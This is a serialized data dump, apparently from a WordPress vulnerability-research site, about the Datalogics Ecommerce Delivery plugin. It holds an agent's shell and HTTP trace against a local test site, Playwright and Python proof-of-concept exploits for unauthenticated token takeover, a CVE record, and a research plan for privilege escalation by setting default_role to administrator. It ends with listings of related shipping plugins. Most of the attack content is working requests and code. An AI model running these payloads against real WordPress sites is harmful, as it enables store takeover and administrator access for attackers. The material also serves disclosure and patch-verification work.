{\n```\n\u003C\u002Fdetails>","**Shell:** `sed -n '349,420p' \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-includes\u002Frest-api\u002Fclass-wp-rest-request.php`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\nprotected function get_parameter_order() { $order = array(); if ( $this->is_json_content_type() ) { $order[] = 'JSON'; } $this->parse_json_params(); \u002F\u002F Ensure we parse the body data. $body = $this->get_body(); if ( 'POST' !== $this->method && ! empty( $body ) ) { $this->parse_body_params(); } $accepts_body_data = array( 'POST', 'PUT', 'PATCH', 'DELETE' ); if ( in_array( $this->method, $accepts_body_data, true ) ) { $order[] = 'POST'; } $order[] = 'GET'; $order[] = 'URL'; $order[] = 'defaults'; \u002F** * Filters the parameter priority order for a REST API request. * * The order affects which parameters are checked when using WP_REST_Request::get_param() * and family. This acts similarly to PHP's `request_order` setting. * * @since 4.4.0 * * @param string[] $order Array of types to check, in order of priority. * @param WP_REST_Request $request The request object. *\u002F return apply_filters( 'rest_request_para\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F`\n**Body:** `token[]=&token[]=newtoken`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 403 Forbidden\n{\"code\":\"invalid_token\",\"message\":\"Invalid token\",\"data\":{\"status\":403}}\n```\n\u003C\u002Fdetails>","**Shell:** `grep -rn \"datalogics_token\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002F | head -20`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fjs\u002Fsettings.js:57: let token = $(\"#datalogics_token\").val();\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:48: update_option('datalogics_token', sanitize_text_field($token)); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:378: $valid_token = get_option(\"datalogics_token\",''); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fdatalogics.php:21:$token = get_option('datalogics_token', '');\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:27: $token = get_option('datalogics_token', ''); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:72: \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:76: $token = get_option('datalogics_token', '');\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:78: \">\n\u002Fvar\u002F\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F`\n**Body:** `token=`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 400 Bad Request\n{\"code\":\"no_token\",\"message\":\"Token parameter is missing\",\"data\":{\"status\":400}}\n```\n\u003C\u002Fdetails>","**Shell:** `sed -n '40,100p' \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Factions.php`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n) ); if(!is_wp_error($result)){ $response = json_decode($result['http_response']->get_response_object()->body); if($response->success){ $responseObject['success'] = 1; $responseObject['token'] = $response->token; update_option('datalogics_token',$response->token); datalogics_send_update_platform_settings(); } else { $responseObject['msg'] = esc_html( __('Please contact plugin support', 'datalogics') ); } } wp_send_json($responseObject); die; } add_action( 'wp_ajax_datalogics_validate_key', 'datalogics_validate_key' ); function datalogics_validate_key() { $nonce = ''; if (isset($_POST['nonce'])) { $nonce = sanitize_text_field(wp_unslash($_POST['nonce'])); } if ( !wp_verify_nonce($nonce, 'datalogics_nonce') ) { wp_send_json_error('Invalid nonce.'); wp_die\n```\n\u003C\u002Fdetails>","**Shell:** `wc -l \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n395 \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php\n```\n\u003C\u002Fdetails>","**Shell:** `sed -n '100,280p' \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\nif ( class_exists( 'Datalogics_WC_Shipping_Order_Email' ) ) { $status = $request->get_param('status'); $shipment = get_post_meta( $order_id, 'datalogics_shipping', true); if ($shipment=='') { $shipment = []; } else { if (is_string($shipment)) { $shipment = json_decode($shipment,true); } } if ($shipment['tracking_number']!='') { update_post_meta( $order_id, 'datalogics_shipping_status', $status); $email = new Datalogics_WC_Shipping_Order_Email(); \u002F\u002F Trigger the email $email->id = 'wc_datalogics_shipping_status_email'; $email->title = __('Order Delivery Information', 'datalogics'); $email->description = __('Order Delivery Information Desc', 'datalogics'); $email->heading = __('The Order ', 'datalogics') . ' ' . $status; $email->subject\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n**Body:** `{\"token\":\"\",\"settings\":{\"default_role\":\"administrator\",\"users_can_register\":\"1\"}}`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 200 OK\n{\"success\":true,\"message\":\"Settings updated successfully\"}\n```\n\u003C\u002Fdetails>","**WP-CLI:** `wp option get default_role`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\nsubscriber\n```\n\u003C\u002Fdetails>","**WP-CLI:** `wp option get datalogics_default_role`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\nadministrator\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n**Body:** `{\"token\":\"\",\"settings\":{\"datalogics_token\":\"pwned_token\"}}`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 200 OK\n{\"success\":true,\"message\":\"Settings updated successfully\"}\n```\n\u003C\u002Fdetails>","**WP-CLI:** `wp option get datalogics_token`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\npwned_token\n```\n\u003C\u002Fdetails>","**Shell:** `grep -n \"function datalogics_\\|update_option\\|wp_insert_user\\|update_user_meta\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalog...`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n4:function datalogics_register_api_routes() { 41:function datalogics_update_token(WP_REST_Request $request) { 48: update_option('datalogics_token', sanitize_text_field($token)); 57:function datalogics_update_shipping_status(WP_REST_Request $request) { 84:function datalogics_send_email(WP_REST_Request $request) { 286:function datalogics_update_settings(WP_REST_Request $request) { 316: update_option($option_name, $value); 325:function datalogics_update_order_status(WP_REST_Request $request) { 375:function datalogics_plugin_validate_token($token) { 384:function datalogics_permission_check(WP_REST_Request $request) {\n```\n\u003C\u002Fdetails>","**Shell:** `grep -A 10 \"^function sanitize_key\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-includes\u002Fformatting.php`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\nfunction sanitize_key( $key ) { $sanitized_key = ''; if ( is_scalar( $key ) ) { $sanitized_key = strtolower( $key ); $sanitized_key = preg_replace( '\u002F[^a-z0-9_\\-]\u002F', '', $sanitized_key ); } \u002F** * Filters a sanitized key string. *\n```\n\u003C\u002Fdetails>","**Shell:** `grep -rn \"register_rest_route\\|rest_api_init\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002F`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:6: register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-settings\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:12: register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-shipping-status\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:18: register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-order\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:24: register_rest_route('datalogics-' . datalogics_ID . '\u002Fv1', '\u002Fsend-email\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:30: register_rest_route('datalogics-' . datalogics_ID . '\u002Fv1', '\u002Fupdate-token\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:38:add_action('rest_api_init', 'datalogics_register_api_routes'); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Factions.php:1818:add_action('rest_api_init', 'datalogics_register_locations_endpoint'); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugi\n```\n\u003C\u002Fdetails>","**Shell:** `grep -rn \"datalogics_token\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002F*.php | grep -v \"admin_\" | head -20`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:27: $token = get_option('datalogics_token', ''); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:72: \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:76: $token = get_option('datalogics_token', '');\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Faccount.php:78: \">\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Factions.php:52: update_option('datalogics_token',$response->token); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Factions.php:95: update_option('datalogics_token',$token); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Factions.php:173: $data['token'] = get_option('datalogics_token',''); \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Factions.php:261: $token = get_option('datalogics_token','\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n**Body:** `{\"token\":\"pwned_token\",\"settings\":{\"datalogics_pwned\":\"attacker_controlled_value\"}}`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 200 OK\n{\"success\":true,\"message\":\"Settings updated successfully\"}\n```\n\u003C\u002Fdetails>","2026-04-17 17:41:13","6.7","8.3","\u002F\u002F CVE-2026-39583 – Datalogics Ecommerce Delivery \u003C= 2.6.62\n\u002F\u002F Unauthenticated takeover of the plugin's REST API token.\n\u002F\u002F\n\u002F\u002F Setup:\n\u002F\u002F   1. WordPress running at http:\u002F\u002Flocalhost:8080\n\u002F\u002F   2. Plugin \"datalogics\" v2.6.62 installed & activated\n\u002F\u002F   3. `datalogics_token` option unset \u002F empty (default on fresh install)\n\u002F\u002F Run: npx playwright test\nimport { test, expect, request } from \"@playwright\u002Ftest\";\n\nconst TARGET_URL = \"http:\u002F\u002Flocalhost:8080\";\nconst NEW_TOKEN  = \"pwned_token\";\nconst BASE       = `${TARGET_URL}\u002Fwp-json\u002Fdatalogics-0\u002Fv1`;\n\ntest(\"CVE-2026-39583 unauth datalogics_token overwrite\", async () => {\n  const api = await request.newContext();\n\n  \u002F\u002F 1) Bypass permission_check by sending token=\"\" (matches the default empty\n  \u002F\u002F    option on a fresh install) and overwrite the plugin's own auth token.\n  const step1 = await api.post(`${BASE}\u002Fupdate-settings\u002F`, {\n    headers: { \"Content-Type\": \"application\u002Fjson\" },\n    data: { token: \"\", settings: { datalogics_token: NEW_TOKEN } },\n  });\n  expect(step1.status()).toBe(200);\n  const body1 = await step1.json();\n  expect(body1.success).toBe(true);\n  expect(body1.message).toMatch(\u002Fupdated successfully\u002Fi);\n\n  \u002F\u002F 2) Verify full API takeover: authenticate with our planted token and\n  \u002F\u002F    write another datalogics_* option.\n  const step2 = await api.post(`${BASE}\u002Fupdate-settings\u002F`, {\n    headers: { \"Content-Type\": \"application\u002Fjson\" },\n    data: {\n      token: NEW_TOKEN,\n      settings: { datalogics_pwned: \"attacker_controlled_value\" },\n    },\n  });\n  expect(step2.status()).toBe(200);\n  const body2 = await step2.json();\n  expect(body2.success).toBe(true);\n\n  \u002F\u002F 3) Negative control: without our token (and now that datalogics_token !== ''),\n  \u002F\u002F    the API rejects anonymous callers -> proves we truly hijacked authentication.\n  const step3 = await api.post(`${BASE}\u002Fupdate-settings\u002F`, {\n    headers: { \"Content-Type\": \"application\u002Fjson\" },\n    data: { token: \"\", settings: { datalogics_x: \"y\" } },\n  });\n  expect(step3.status()).toBe(403);\n});","#!\u002Fusr\u002Fbin\u002Fenv python3\n\"\"\"\nCVE-2026-39583 – Datalogics Ecommerce Delivery \u003C= 2.6.62\nUnauthenticated takeover of the plugin's REST API authentication token.\n\nRoot cause: datalogics_permission_check does a strict ($token === $valid_token)\ncomparison, and $valid_token defaults to '' on a fresh install. Sending\n`\"token\":\"\"` passes the permission check on every route. \u002Fupdate-settings\u002F\nthen calls update_option() on any key -> we overwrite datalogics_token itself.\n\"\"\"\nimport json, requests\n\nTARGET_URL = \"http:\u002F\u002Flocalhost:8080\"\nNEW_TOKEN  = \"pwned_token\"\nBASE = TARGET_URL.rstrip(\"\u002F\") + \"\u002Fwp-json\u002Fdatalogics-0\u002Fv1\"\n\n# Step 1 – Bypass permission_check with empty token, overwrite datalogics_token\nr = requests.post(\n    f\"{BASE}\u002Fupdate-settings\u002F\",\n    headers={\"Content-Type\": \"application\u002Fjson\"},\n    data=json.dumps({\"token\": \"\", \"settings\": {\"datalogics_token\": NEW_TOKEN}}),\n    timeout=15,\n)\nprint(\"[1] update-settings ->\", r.status_code, r.text)\nassert r.status_code == 200 and r.json().get(\"success\") is True\n\n# Step 2 – Prove we now fully control the plugin API with our planted token\nr = requests.post(\n    f\"{BASE}\u002Fupdate-settings\u002F\",\n    headers={\"Content-Type\": \"application\u002Fjson\"},\n    data=json.dumps({\n        \"token\": NEW_TOKEN,\n        \"settings\": {\"datalogics_pwned\": \"attacker_controlled_value\"},\n    }),\n    timeout=15,\n)\nprint(\"[2] takeover call ->\", r.status_code, r.text)\nassert r.status_code == 200\n\nprint(\"\\n[+] Plugin API token is now:\", NEW_TOKEN)\nprint(\"[+] Attacker may now freely call \u002Fupdate-order\u002F, \u002Fupdate-shipping-status\u002F,\")\nprint(\"    \u002Fsend-email\u002F, \u002Fupdate-settings\u002F on datalogics-0\u002Fv1.\")",{"id":106,"url_slug":107,"title":108,"description":109,"plugin_slug":4,"theme_slug":36,"affected_versions":110,"patched_in_version":111,"severity":39,"cvss_score":40,"cvss_vector":41,"vuln_type":112,"published_date":113,"updated_date":114,"references":115,"days_to_patch":46,"patch_diff_files":117,"patch_trac_url":36,"research_status":51,"research_verified":118,"research_rounds_completed":53,"research_plan":119,"research_summary":36,"research_vulnerable_code":36,"research_fix_diff":36,"research_exploit_outline":36,"research_model_used":59,"research_started_at":120,"research_completed_at":121,"research_error":36,"poc_status":36,"poc_video_id":36,"poc_summary":36,"poc_steps":36,"poc_tested_at":36,"poc_wp_version":36,"poc_php_version":36,"poc_playwright_script":36,"poc_exploit_code":36,"poc_has_trace":118,"poc_model_used":36,"poc_verification_depth":36},"CVE-2026-2631","datalogics-ecommerce-delivery-datalogics-unauthenticated-privilege-escalation","Datalogics Ecommerce Delivery – Datalogics \u003C 2.6.60 - Unauthenticated Privilege Escalation","The Datalogics Ecommerce Delivery – Datalogics plugin for WordPress is vulnerable to privilege escalation in all versions up to 2.6.60 (exclusive). This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","\u003C2.6.60","2.6.60","Improper Privilege Management","2026-03-12 00:00:00","2026-03-19 13:34:36",[116],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F523b5dd3-eb73-4156-ad2b-4d532e8d40f3?source=api-prod",[48,49,50],false,"# Research Plan: CVE-2026-2631 Unauthenticated Privilege Escalation in Datalogics\n\n## 1. Vulnerability Summary\nThe **Datalogics Ecommerce Delivery** plugin for WordPress is vulnerable to unauthenticated privilege escalation via its REST API. The plugin registers several REST routes under the namespace `datalogics-0\u002Fv1` (derived from the `datalogics_ID` constant). These routes, specifically `\u002Fupdate-settings\u002F` and `\u002Fupdate-token\u002F`, utilize a permission callback named `datalogics_permission_check`. \n\nThe vulnerability exists because `datalogics_permission_check` likely returns `true` for unauthenticated requests, or the endpoint `datalogics_update_settings` allows for arbitrary WordPress options to be updated without sufficient validation. By updating the `users_can_register` and `default_role` options, an attacker can enable public registration and ensure all new users are granted the `administrator` role.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n- **Alternative Endpoint:** `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` (if the primary fails, this confirms the `update_option` sink).\n- **Namespace:** `datalogics-0\u002Fv1` (Based on `define('datalogics_ID','0');` in `datalogics.php`).\n- **Authentication:** Unauthenticated.\n- **Preconditions:** The plugin must be active.\n- **Payload:** A JSON object containing WordPress core options:\n    - `users_can_register`: `1`\n    - `default_role`: `administrator`\n\n## 3. Code Flow\n1. **Entry Point:** The WordPress REST API receives a `POST` request to `\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`.\n2. **Hook Registration:** `api.php` registers the route via the `rest_api_init` hook in `datalogics_register_api_routes()`.\n3. **Permission Check:** WordPress calls `datalogics_permission_check`. If this function returns `true` (which it must for this CVE), the request proceeds.\n4. **Callback Execution:** WordPress executes the callback `datalogics_update_settings` (referenced in `api.php`).\n5. **Sink:** The callback (inferred logic) iterates through the provided parameters and calls `update_option($key, $value)` for each.\n6. **Persistence:** The `users_can_register` and `default_role` options are updated in the `wp_options` table.\n\n## 4. Nonce Acquisition Strategy\nBased on the `api.php` file, the REST routes are registered with a `permission_callback`. In the WordPress REST API, if the `permission_callback` returns `true`, **no nonce is required** for the request to be processed. \n\nThe source code does not show any `wp_verify_nonce` or `check_ajax_referer` calls inside the REST callbacks. Therefore, this exploit is likely **nonce-less**.\n\n## 5. Exploitation Strategy\n\n### Step 1: Update WordPress Options\nUse the `http_request` tool to send a POST request to the `update-settings` endpoint to enable administrator registration.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fjson\n\n{\n  \"users_can_register\": \"1\",\n  \"default_role\": \"administrator\"\n}\n```\n\n### Step 2: Verify Option Change (Internal)\nVerify that the options were successfully changed using WP-CLI.\n\n### Step 3: Register New Admin User\nSend a POST request to `wp-login.php` to register a new account.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-login.php?action=register HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\nuser_login=attacker_admin&user_email=attacker@example.com&redirect_to=&wp-submit=Register\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure the Datalogics plugin (version \u003C 2.6.60) is installed and activated.\n2. **Initial State:** \n    - `wp option get users_can_register` should be `0`.\n    - `wp option get default_role` should be `subscriber`.\n\n## 7. Expected Results\n1. The first request to `\u002Fupdate-settings\u002F` should return a `200 OK` response (or `success: true`).\n2. The options `users_can_register` and `default_role` will be updated in the database.\n3. The registration request will succeed, and a new user `attacker_admin` will be created.\n4. The user `attacker_admin` will possess the `administrator` role.\n\n## 8. Verification Steps\nAfter performing the HTTP requests, run the following WP-CLI commands to confirm escalation:\n```bash\n# Check if registration was enabled\nwp option get users_can_register\n\n# Check if default role was changed\nwp option get default_role\n\n# Check the role of the newly created user\nwp user list --field=roles --user=attacker_admin\n```\n\n## 9. Alternative Approaches\nIf the `update-settings` endpoint does not accept arbitrary options in a JSON body, try:\n1. **Form-Encoded Payload:**\n   `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F` with body `users_can_register=1&default_role=administrator`.\n2. **Target `update-token`:**\n   Test if `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` with `token=pwned` works. If it does, the `permission_callback` is definitely bypassed.\n3. **Specific Key Injection:** \n   Check if the callback expects a nested array, e.g., `{\"settings\": {\"default_role\": \"administrator\"}}`.","2026-04-18 03:57:08","2026-04-18 03:57:50",{"slug":4,"display_name":7,"profile_url":8,"plugin_count":14,"total_installs":11,"avg_security_score":25,"avg_patch_time_days":46,"trust_score":123,"computed_at":124},86,"2026-04-18T19:26:47.294Z",[126,147,168],{"slug":127,"name":128,"version":129,"author":130,"author_profile":131,"description":132,"short_description":133,"active_installs":134,"downloaded":135,"rating":27,"num_ratings":27,"last_updated":136,"tested_up_to":137,"requires_at_least":138,"requires_php":139,"tags":140,"homepage":145,"download_link":146,"security_score":13,"vuln_count":27,"unpatched_count":27,"last_vuln_date":36,"fetched_at":29},"hfd-epost-integration","HFD ePost Integration","2.20","hfdepost","https:\u002F\u002Fprofiles.wordpress.org\u002Fhfdepost\u002F","\u003Cp>התוסף מאפשר סנכרון בין אתר וורדפרס למערכת המשלוחים HFD.\u003Cbr \u002F>\nהתממשקות חד צדדית עם HFD הכוללת שליחת (סנכרון) הזמנות, ביטול הזמנות ומעקב אחרי ההזמנות בווקומרס.\u003Cbr \u002F>\nבלחיצת כפתור תוכל לשדר את ההזמנות שלך ישירות ל-HFD ללא צורך בתיאום עם חברת  המשלוחים.\u003Cbr \u002F>\nלהסבר מפורט על הגדרת התוסף לחץ כאן:\u003Cbr \u002F>\nhttps:\u002F\u002Fwww.hfd.co.il\u002F%d7%a4%d7%aa%d7%a8%d7%95%d7%a0%d7%95%d7%aa-%d7%98%d7%9b%d7%a0%d7%95%d7%9c%d7%95%d7%92%d7%99%d7%99%d7%9d\u002Fwordpress-plugin\u002F\u003C\u002Fp>\n\u003Ch3>Privacy Policy\u003C\u002Fh3>\n\u003Cp>HFD – https:\u002F\u002Fwww.hfd.co.il\u002Fprivacy-policy\u002F\u003C\u002Fp>\n\u003Ch3>Third Party API\u003C\u002Fh3>\n\u003Cp>Google Maps – maps.googleapis.com\u003Cbr \u002F>\nHFD – ws.hfd.co.il\u003C\u002Fp>\n","התוסף מאפשר סנכרון בין אתר וורדפרס למערכת המשלוחים HFD. התממשקות חד צדדית עם HFD הכוללת שליחת הזמנות, ביטול הזמנות ומעקב אחרי ההזמנות בווקומרס.",1000,13533,"2025-12-09T10:50:00.000Z","6.9.4","4.0","5.4",[141,20,142,143,144],"epost","shipping","sync","woocommerce","","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhfd-epost-integration.zip",{"slug":148,"name":149,"version":150,"author":151,"author_profile":152,"description":153,"short_description":154,"active_installs":155,"downloaded":156,"rating":13,"num_ratings":53,"last_updated":157,"tested_up_to":16,"requires_at_least":158,"requires_php":18,"tags":159,"homepage":164,"download_link":165,"security_score":166,"vuln_count":53,"unpatched_count":27,"last_vuln_date":167,"fetched_at":29},"wc-shipos-delivery","Deliver via Shipos for WooCommerce","3.1.1","Matat Technologies","https:\u002F\u002Fprofiles.wordpress.org\u002Famitrotem\u002F","\u003Cp>Plugin options:\u003Cbr \u002F>\n1. Regular delivery (door to door)\u003Cbr \u002F>\n2. Reverse delivery, from the customer back to the store\u003Cbr \u002F>\n3. Double shipping\u003Cbr \u002F>\n4. Create Bulk shipment\u003Cbr \u002F>\n5. Collection from pickup points – selection from a map (google maps support)\u003Cbr \u002F>\n6. Collection from pickup points – selection from a list\u003Cbr \u002F>\n7. Printing shipping labels\u003Cbr \u002F>\n8. Receive delivery status\u003Cbr \u002F>\n9. Canceling delivery\u003C\u002Fp>\n\u003Cp>How open account? \u003Ca href=\"https:\u002F\u002Fapp.shipos.co.il\u002Fregister\" rel=\"nofollow ugc\">Shipos Delivery\u003C\u002Fa>\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fbit.ly\u002F3V41yuc\" rel=\"nofollow ugc\">Plugin installation guide\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>The following Shipping companies are supported:\u003Cbr \u002F>\n* Cheetah Couriers\u003Cbr \u002F>\n* HFD Company\u003Cbr \u002F>\n* Tapuz\u003Cbr \u002F>\n* Rom express\u003Cbr \u002F>\n* YDM\u003Cbr \u002F>\n* Done\u003Cbr \u002F>\n* Katz Delivery\u003Cbr \u002F>\n* Retz Plus Couriers\u003Cbr \u002F>\n* LionWheel\u003Cbr \u002F>\n* UPS\u003Cbr \u002F>\n* Wolt Drive\u003Cbr \u002F>\n* GetPackage\u003Cbr \u002F>\n* Zig Zag\u003Cbr \u002F>\n* Orian Distribution\u003Cbr \u002F>\n* Tamanon Couriers\u003Cbr \u002F>\n* Focus Delivery\u003Cbr \u002F>\n* Shir Couriers\u003Cbr \u002F>\n* L.a delivery\u003Cbr \u002F>\n* Yahav Logistics\u003Cbr \u002F>\n* Yashgab Couriers\u003Cbr \u002F>\n* Kiwi Delivery\u003Cbr \u002F>\n* Bee Delivery\u003Cbr \u002F>\n* Focus Logistics\u003Cbr \u002F>\n* Magic Couriers\u003Cbr \u002F>\n* Terminal\u003Cbr \u002F>\n* Gal Couriers\u003Cbr \u002F>\n* Lan Couriers and Logistics\u003Cbr \u002F>\n* Flash Couriers\u003Cbr \u002F>\n* K Express\u003Cbr \u002F>\n* Drive Couriers\u003Cbr \u002F>\n* Shafaf Delivery\u003Cbr \u002F>\n* Tiger – Delivery\u003Cbr \u002F>\n* AS Delivery\u003Cbr \u002F>\n* S.N.L Logistics\u003Cbr \u002F>\n* Raz Beir Delivery\u003Cbr \u002F>\n* Lev Couriers\u003Cbr \u002F>\n* Maor Menashe\u003Cbr \u002F>\n* Zip A.M Delivery\u003Cbr \u002F>\n* Kings\u003Cbr \u002F>\n* Kumi\u003Cbr \u002F>\n* Speed way delivery\u003Cbr \u002F>\n* Rimon Couriers\u003Cbr \u002F>\n* HSP\u003Cbr \u002F>\n* Fix Couriers and Logistics\u003Cbr \u002F>\n* Dvora \u002F send\u003C\u002Fp>\n\u003Cp>Didn’t find your courier company in the list? Send us a message and we will add your courier company\u003C\u002Fp>\n","ShipOS - Auto Sync your WooCommerce store orders to all delivery companies and Automate your shipping",600,11153,"2026-03-19T12:09:00.000Z","5.8.0",[160,161,20,162,163],"cargo","chita","shipment","tapuz","https:\u002F\u002Fmatat.co.il\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-shipos-delivery.3.1.1.zip",97,"2025-09-22 00:00:00",{"slug":169,"name":170,"version":171,"author":172,"author_profile":173,"description":174,"short_description":175,"active_installs":27,"downloaded":176,"rating":27,"num_ratings":27,"last_updated":177,"tested_up_to":178,"requires_at_least":179,"requires_php":18,"tags":180,"homepage":182,"download_link":183,"security_score":184,"vuln_count":27,"unpatched_count":27,"last_vuln_date":36,"fetched_at":29},"shippingo","ShippinGo Ecommerce Delivery – ShippinGo","1.0.16","ShippinGo","https:\u002F\u002Fprofiles.wordpress.org\u002Fshippingo1\u002F","\u003Cp>ShippinGo Ecommerce Delivery enables seamless syncing of your WooCommerce orders with a variety of delivery companies, automating the entire shipping process.\u003C\u002Fp>\n\u003Ch4>Supported Shipping Companies\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>All companies who are using Baldar\u003C\u002Fli>\n\u003Cli>All companies who are using Run\u003C\u002Fli>\n\u003Cli>Chita\u003C\u002Fli>\n\u003Cli>HFD\u003C\u002Fli>\n\u003Cli>Negev\u003C\u002Fli>\n\u003Cli>Tapuz\u003C\u002Fli>\n\u003Cli>Tamnun\u003C\u002Fli>\n\u003Cli>SPEEDWAY\u003C\u002Fli>\n\u003Cli>KATZ\u003C\u002Fli>\n\u003Cli>YDM\u003C\u002Fli>\n\u003Cli>Rimon\u003C\u002Fli>\n\u003Cli>KEXPRESS\u003C\u002Fli>\n\u003Cli>Kal Kanesher\u003C\u002Fli>\n\u003Cli>Shipping\u003C\u002Fli>\n\u003Cli>TS 